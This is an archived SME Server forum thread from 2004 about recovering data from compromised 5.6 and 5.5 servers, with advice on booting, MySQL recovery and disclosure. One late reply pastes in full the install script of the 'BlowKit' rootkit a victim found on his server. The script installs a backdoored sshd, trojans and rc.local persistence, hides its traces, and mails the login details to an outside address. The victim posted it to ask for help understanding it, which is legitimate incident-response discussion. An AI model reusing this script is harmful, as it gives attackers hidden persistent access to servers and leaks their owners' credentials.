Koozali.org: home of the SME Server

5.6 Hacked/Rooted, Trying to recover

Brian L.

5.6 Hacked/Rooted, Trying to recover
« on: March 31, 2004, 03:10:45 PM »
Everyone,

Well, I have a clients box that was rooted earlier this week. I have taken it offline, but there is data that I would like to get off of this box before I format it.

This box is 5.6 with most current updates. I will be moving this client to 6.0.1 ISO after I get the data off, but for now, I cannot get into the machine for a variety of reasons.

1 - I cannot get through the full boot, it halts just after "Enabling Swap Space -- OK". So, could someone provide a way for me to turn off services, so I can just get to a login? I have tried CTRL-X, then "Mitel-SME Emergency rw", but this asks for root password (explained in next problem). Booting normall always halts right after "Enabling Swap Space". Any help would be appreciated, perhaps in editing a file that can disable services.

2 - The root password has been changed. I have booted in with Knoppix to change the /etc/shadow file, to remove the root password, but this doesnt ever seem to have any impact. I remove the * between the first and second ":", save, and reboot, and the root password is still there (I am able to test using Mitel-SME emergency rw"). Any other good ideas on how to change root password? If I can fix #1, I can probably do this with "Mitel-SME single", but for now that just freezes after enabling swap like above.

Any help greatly appreciated.

Brian

Brian L.

Update
« Reply #1 on: March 31, 2004, 03:59:27 PM »
For problem #1, I am somewhat sure it is not the SWAP, as I have tried creating a new swap using mkswap -c /dev/hda2 from knoppix. This worked fine.

So, an additional question for problem #1 is: How can I find out the file where things boot, so I can disable the next thing after "enabling swap", whatever it is. Even finding out what is is would be useful even if I cant change it.

Thanks
Brian

Offline Boris

  • *
  • 783
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #2 on: March 31, 2004, 10:07:16 PM »
Why not copy data off this server while booted from Knoppix CD?
...

Brian L.

5.6 Hacked/Rooted, Trying to recover
« Reply #3 on: March 31, 2004, 11:51:10 PM »
One word: MySQL. The data I need is buried in multiple mysql databases, and the easiest/best way for me to get the data off is to be able to boot in and do a sql backup.

Brian

Brian L

Another Question - Logs
« Reply #4 on: April 01, 2004, 12:26:26 AM »
Another Question that I have that falls into this general topic -- Where can I find files about the boot up? IE, so I can pinpoint what is going wrong right after enabling swap.

Someone, Anyone, Throw me a bone!

Brian

Brushfireb

Incentive!
« Reply #5 on: April 01, 2004, 01:45:43 AM »
Everyone,

To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian

LoRz

5.6 Hacked/Rooted, Trying to recover
« Reply #6 on: April 01, 2004, 03:38:58 AM »
From the top of my mind there is an "interactive boot" option that can be used to allow/prevent services from being started.

try this:

1. Edit /etc/sysconfig/init to contain the line

PROMPT=yes

(If it's set to NO).
 
2. Reboot box and hold button "I" pressed during hardware configuration messages shown on the screen. At some point you'll see questions about which service start or not. Then you can select services you need to run. Hope, it may help to resolve your problem  :-).

Regards

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #7 on: April 01, 2004, 03:54:04 AM »
Lorz,

Thanks for the suggestion. I dont think the boot is getting far. After trying your suggestion, i doesnt do anything except echo onto the screen. tryed holding, tapping, pressing randomely, nothing.

Im not convinced the machine has even started loading services yet.

The last couple lines that I see are:

Finding Module Dependencies       [ OK ]
Checking Filesystems
  /Boot: recovering journal
  /Boot: clean, 33/26104, somenumber blocks
Mounting Local Filesystems        [ OK ]
Enabling Local Filesystem Quotas  [ OK ]
Enabling Swap Space               [ OK ]

It halts there, the line above just sits there forever.

Brian

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #8 on: April 01, 2004, 04:14:59 AM »
Can you login in single user mode?

I think  
ctrl-x  when the blue screen comes up.
? for list of kernels
then type '(kernel) single'  where (kernel) is one of the kernels listed.

Ed

Offline mdo

  • *
  • 355
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #9 on: April 01, 2004, 04:44:15 AM »
I would go with Boris' recommendation:

Boot from Knoppix to be able to check
- is that HDD still properly partitioned?
- can you run an file system check (e2fsck) on the existing partitions?

Regards,
Michael
...

Offline Boris

  • *
  • 783
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #10 on: April 01, 2004, 05:34:34 AM »
I am no MySQL guru (or any serious DB guru for this mater), but I have copied all the files from /var/lib/mysql folder (while MySQL server was stopped) to the new server before and it worked.
By the way I’ve done before almost the same with MSSQL data as well and it worked too.
...

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #11 on: April 01, 2004, 09:32:11 PM »
Quote from: "Ed"
Can you login in single user mode?

I think  
ctrl-x  when the blue screen comes up.
? for list of kernels
then type '(kernel) single'  where (kernel) is one of the kernels listed.

Ed


Yes, I have tried this. Strangely, I get "Segmentation fault" whenever I try to do anything.

I really think this system has huge HD corruption.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #12 on: April 01, 2004, 09:33:48 PM »
Quote from: "mdo"
I would go with Boris' recommendation:

Boot from Knoppix to be able to check
- is that HDD still properly partitioned?
- can you run an file system check (e2fsck) on the existing partitions?

Regards,
Michael


Michael,

Thanks for the tip. I have already checked the partitions, and can access all of them fine when I am booted from Knoppix. They mount find and I can move around and grab files. e2fsk runs fine, no errors.

I have even begun testing the hardware to see if that is an issue. Memtest86 returns all fine.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #13 on: April 01, 2004, 09:35:11 PM »
Quote from: "Boris"
I am no MySQL guru (or any serious DB guru for this mater), but I have copied all the files from /var/lib/mysql folder (while MySQL server was stopped) to the new server before and it worked.
By the way I’ve done before almost the same with MSSQL data as well and it worked too.


I think this is what I am going to have to do. I have another unused machine that I am going to get access to this weekend, and I will do fresh install of 5.6 and try to grab the data out of MySql by copying files like you suggest.

I will let you know how I fare.

Brian

freddo

5.6 Hacked/Rooted, Trying to recover
« Reply #14 on: April 02, 2004, 04:06:35 AM »
Unfortunately u have been "rooted"

I have had 5 machines screwed up in the last two weeks. Your 'segmentation fault' message is because that particular command has been hacked.
eg if you try using ls in single user you may get the message but try dir and you wont.

the disk is fine just commands like ps, ls etc are screwed.

if you can mount the disk on a different machine you should be able to copy any data off.

I was lucky - only using them as firewalls so it was a simple rebuild fir me

Brian L

5.6 Hacked/Rooted, Trying to recover
« Reply #15 on: April 02, 2004, 04:57:37 AM »
Interesting that you have had this happen to you so frequently.

Do you think it is something with the SME distribution? like an exploit or hack that is easy?

Brian

Offline MSmith

  • *
  • 675
  • +0/-0
Isn't this a BIG DEAL?
« Reply #16 on: April 02, 2004, 08:56:09 AM »
I mean, if these 5.6 boxes have actually been rooted ... (where's the documentation on the successful attack, BTW?) then this is a big problem for those of us who haven't "taken the plunge" and upgraded from 5.6 on production machines!!!

So, gentlemen ... how about some DETAILS on these hacked boxes?

FWIW I installed and ran the following:

http://www.rootkit.nl/projects/rootkit_hunter.html

It said my 5.6u6 box is clean.
...

fredd0

5.6 Hacked/Rooted, Trying to recover
« Reply #17 on: April 02, 2004, 01:02:54 PM »
the machines I have had messed up are 5.1.2, 5.5

they were not necessarily fully patched on the patches that were available and I had left command line access open from the internet.

ie It was my own stupid fault

Offline MSmith

  • *
  • 675
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #18 on: April 02, 2004, 09:40:06 PM »
Understood, Freddo, but what about you, Brian?  You said your 5.6 box had been hacked; it would definitely be a service to the community if you could show how it was done.

5.1.2 and 5.5 have been deprecated for awhile due to security concerns, but I thought 5.6u6 and 6.0 were OK.
...

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #19 on: April 03, 2004, 02:11:39 AM »
Quote from: "MSmith"
Understood, Freddo, but what about you, Brian?  You said your 5.6 box had been hacked; it would definitely be a service to the community if you could show how it was done.


Sorry - I dont agree.

If it was hacked - then it should be reported to the contrib guys. I and my customers dont want to see a 5.6 hacking howto posted on this site.

Offline MSmith

  • *
  • 675
  • +0/-0
You raise a good point there
« Reply #20 on: April 04, 2004, 07:47:17 AM »
Hacking howto not wanted, just SOME information as to how the blackhat got in.  I.e. a specific service, that should be turned off, or a PHP vulnerability in a certain version, or what?  Just saying "I've been hacked" is nothing more than alarmist, in my view.
...

Offline mark

  • *
  • 34
  • +0/-0
    • http://webcoda.com
5.6 Hacked/Rooted, Trying to recover
« Reply #21 on: April 04, 2004, 08:07:18 AM »
Sorry - I dont agree.

If it was hacked - then it should be reported to the contrib guys. I and my customers dont want to see a 5.6 hacking howto posted on this site.[/quote]

- and I disagree with you - I would rather know about the hack NOW so I can protect my clients NOW - not when some other special group decides that I should know. It would appear that the hacker community already knows ....

cheers

Mark

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #22 on: April 04, 2004, 02:07:39 PM »
Quote from: "mark"
-and I disagree with you - I would rather know about the hack NOW so I can protect my clients NOW - not when some other special group decides that I should know. It would appear that the hacker community already knows ....


and I disagree with you - What I want is a fix for the alleged hack before someone goes blabbing about it on a public forum.

It would appear that the hacker community already knows what

Offline del

  • *
  • 765
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #23 on: April 04, 2004, 04:48:34 PM »
Hi Brian,
I am not a Linux guru but this site may help: http://ebcd.pcministry.com/ it is aimed at messed up windows systems but allows copying of files etc.to and from any system that can use "long file names" Also includes a password reset tool. I hope this helps.
Regards,
Del :pint:
If at first you don't succeed, then sky-diving is not for you!
"Life is like a coin. You can spend it anyway you wish, but you can only spend it once." --Author Unknown

Brian L.

5.6 Hacked/Rooted, Trying to recover
« Reply #24 on: April 04, 2004, 11:40:27 PM »
Hey everyone,

Sorry for the delay, I havent had time to post in the last day or two.

The system WAS hacked/rooted -- there is no doubt about that. It was defaced and one of the domains running had an index.php that was from a hacker group called ihrdex or something. I saw this before I shutdown the box.

I am in the process of getting my files out of mysql, some images, etc onto another test server, and then to my new production server.

I do not know how they exploited the box -- I use very strong passwords and am not lax on security. Any advice on how to find where the exploit originated on the box is much assisted -- Im not going to format it for a while. I have full access via knoppix.

Brian

guest

5.6 Hacked/Rooted, Trying to recover
« Reply #25 on: April 05, 2004, 06:27:49 PM »
Brian -
1) Were you running a standard 5.6 install or did you install additional contribs?
2) What were the conrtibs?
3) Did you make your distro non-standard in any way (rpm update, etc.)?
4) How was the machine configured (server/gateway/etc.).
5) Were you running any web sites in primary / ibays?

Just wondering as many are probably now concerned about how vulnerable they are.  Thanks for the info. :-o

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #26 on: April 05, 2004, 11:27:26 PM »
Guest,

I was running a 5.6 box with most recent updates (i think update 6, is this correct?)

I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I did not many any non-standard changes in any way other than contribs above. Machine was configured as server+gateway. No VPN, SSH was on for public but nothing else (FTP etc closed). I was using strong passwords.

I was running 3 sites that included an installation of  Mambo Open Source (a CMS), Gallery on another IBAY (pictures), and the third website was just plain HTML.

Again, this is nothing strange here -- I am generally a stickler for security and always make sure files are correct ownership and permissions, etc.

Brian L

5.6 Hacked/Rooted, Trying to recover
« Reply #27 on: April 05, 2004, 11:28:43 PM »
Sorry, above line should read:

"I did not have any non-standard changes in any way other than contribs above"

Brian

Offline stancol

  • ***
  • 90
  • +0/-0
    • http://www.srcproductions.com
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #29 on: April 06, 2004, 05:41:05 PM »
Quote from: "Brian L."

The system WAS hacked/rooted -- there is no doubt about that. It was defaced and one of the domains running had an index.php that was from a hacker group called ihrdex or something. I saw this before I shutdown the box.


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #30 on: April 09, 2004, 03:32:25 PM »
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #31 on: April 11, 2004, 06:49:27 AM »
Quote from: "Anonymous"


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.


Actually, If you read this whole thread, you would realize that I had already documented that I was rooted. The box was not able to boot up, commands in single user mode did not function, and my root password was changed. I think this equates to being rooted.

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #32 on: April 11, 2004, 06:50:11 AM »
Quote from: "Anonymous"
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks


I really couldnt say. The box has been formatted completely, and I didnt track version numbers on these contribs. Sorry.

Brian

Brian

Re: Maybe it was Mambo that was hacked
« Reply #33 on: April 11, 2004, 06:51:05 AM »
Quote from: "stancol"
http://www.net-security.org/vuln.php?id=3337


I am decently sure that I was running 1.0.4, now all of my machines are running the newest 1.0.5. Although, I could be wrong, and this could be the source.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #34 on: April 11, 2004, 11:28:34 PM »
Thanks

Offline stancol

  • ***
  • 90
  • +0/-0
    • http://www.srcproductions.com
Who gets the booby prize?
« Reply #35 on: April 13, 2004, 01:21:53 AM »
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50 I'm way to rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forms need a little humor they've been getting way to serious.)
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Offline Boris

  • *
  • 783
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #36 on: April 13, 2004, 10:38:55 AM »
Brian,
If you feel like it, you could just donate your money to contribs.org to support this forum and hosting.
We all will benefit from it :-)
Just an option and no obligations.
...

Offline stancol

  • ***
  • 90
  • +0/-0
    • http://www.srcproductions.com
Good Idea
« Reply #37 on: April 14, 2004, 05:09:23 AM »
Good idea wish I'd thought of it Boris. Oh well at least my post was funnier than yours.

:hammer:
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Ralph

Another Idea
« Reply #38 on: April 15, 2004, 10:36:55 PM »
I think booting from Knoppix cd, or installing the drive into another Red Hat box and copying the files is a great idea. However, in the future you may want to try this.

1. Clone the drive using Norton Ghost or whatever suits your fancy.

2. Then on the cloned drive, do an upgrade of the server, it will get you booted and access to MySQL and anything else including LOGS!.... This saved me many times.

3. It also allows you to scanvenge what you had and try o find the hacker. I would like to know how you were rooted, were you running Post Nuke or any other forks of PHP Nuke(if so what version)? There is a patch for the latest version of Post Nuke.

-Ralph

Anonymous

Re: Who gets the booby prize?
« Reply #39 on: April 19, 2004, 02:54:09 AM »
Quote from: "stancol"
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50 I'm way to rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forms need a little humor they've been getting way to serious.)


I forgot about this. However, no one really "solved" my problem, just provided workarounds and ways to get the data, that I already knew and was trying. Regardless, I do appreciate everyone's help, so I am donating $25 to contribs! :)

Brian

Tom

Hacked System
« Reply #40 on: April 23, 2004, 08:52:22 PM »
I Have had 5 5.5 systems hacked and left in at state that the system would not start again,

On one of the system i was able to view the files and it seems all files were read only. and on the other servers the swap file was missing.

the systems had no other contribs loaded and were patched. i had remote access to them thought ssl and thats all.

I have now upgraded all other sites to 6 and no more attacks. i would like to know how they got in

Regards

Tom

iFX

What version should I upgrade to?
« Reply #41 on: June 19, 2004, 06:23:56 AM »
I was hacked by my own stupid fault... was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up finding a second temporary backup server etc...

How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some Promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a windows user, not a real admin)...  I then was having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ

The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...

I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.

contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs).  Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!

DOH!  I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?

What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do...  Are the latest 6.0 updates all I'll need?

By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
Code: [Select]
#!/bin/bash

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU}  ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi

if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."

=====================

I don't really understand what that code above does... but maybe someone here can shed some light on it all ;)

Thanks for any advice you could give me.

iFX

Sorry...
« Reply #42 on: June 21, 2004, 06:15:27 AM »
Sorry, I'm an idiot... I didn't mean to post here - was supposed to go in the General area  :(

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #43 on: June 21, 2004, 09:51:28 PM »
Take the 6.0 iso image as a seed to rsync the 6.0.1.

http://mirror.contribs.org/smeserver/contribs/dmay/mitel/howto/rsync-smeserver-5.6dev.iso-howto.html
It's for 5.6 but it the same idea.

Ed

Anonymous

recovering drive
« Reply #44 on: June 22, 2004, 01:08:57 AM »
I am interested in how you restored your mysql. I too have a drive that will not boot, it cant find /ext3 (or something) I have the drive in a windows box and can read and pull data off of it. I just dont know how to add that data into the new install i have on a different box. Any ideas would be great!